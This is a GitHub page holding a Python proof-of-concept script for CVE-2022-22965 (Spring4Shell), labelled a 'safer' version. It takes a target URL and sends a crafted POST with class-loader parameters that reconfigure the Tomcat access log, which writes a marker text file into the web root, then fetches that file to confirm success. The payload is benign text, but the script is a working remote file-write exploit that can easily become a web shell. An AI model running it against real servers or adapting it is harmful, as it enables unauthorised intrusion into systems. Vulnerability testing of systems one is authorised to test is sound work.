-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathSafer_PoC_CVE-2022-22965.py
51 lines (44 loc) · 2.69 KB
/
Safer_PoC_CVE-2022-22965.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#coding:utf-8
# POC modified by @th3_protoCOL
import requests
import argparse
from urllib.parse import urljoin
def Exploit(url, dir):
headers = {"suffix":"%>//",
"c1":"Runtime",
"c2":"<%",
"DNT":"1",
"Content-Type":"application/x-www-form-urlencoded"
}
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=i%20Warning,%20CVE_2022_22965%20was%20sucessfully%20exploited%20on%20this%20device.%20reference:%20https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement%20%20i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.txt&class.module.classLoader.resources.context.parent.pipeline.first.directory=out_dir&class.module.classLoader.resources.context.parent.pipeline.first.prefix=CVE_2022_22965_exploited&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
data = data.replace("out_dir", dir)
try:
print("[*] Full target URL "+url)
print("[*] Perfoming exploit POST request... ")
go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
print("\033[1;33m[*]\033[0m Exploit attempt finished")
print("[*] Exploit attempt status code: "+str(go.status_code))
print("[*] Preview of response: ")
print(go.text[0:120])
result_url = urljoin(url, 'CVE_2022_22965_exploited.txt')
results_check = requests.get(result_url, verify=False)
print("[*] Evidence pull status code: "+str(results_check.status_code))
if results_check.status_code == 200 and results_check.text[0:49] == 'Warning, CVE_2022_22965 was sucessfully exploited':
print("\033[0;32m[+] Exploit successful! \033[0m")
print("[*] URL path: "+result_url)
else:
print("\033[93m[!] Manual verification needed!\033[0m\n[*] Check the results of the exploit by reviewing for the presence \033[1;36mCVE_2022_22965_exploited.txt\033[0m on your webserver!" )
print("\033[93m[*] Preview of "+result_url+"\033[0m")
print(results_check.text[0:200])
except Exception as e:
print("\033[0;31m[-] Exploit Failed\033[00m")
print(e)
pass
def main():
parser = argparse.ArgumentParser(description='CVE-2022-22965 Spring-Core remote code execution POC')
parser.add_argument('--url',help='target url',required=True)
parser.add_argument('--dir',help='directory to write the result (default is "webapps/ROOT")', default = "webapps/ROOT")
args = parser.parse_args()
Exploit(args.url, args.dir)
if __name__ == '__main__':
main()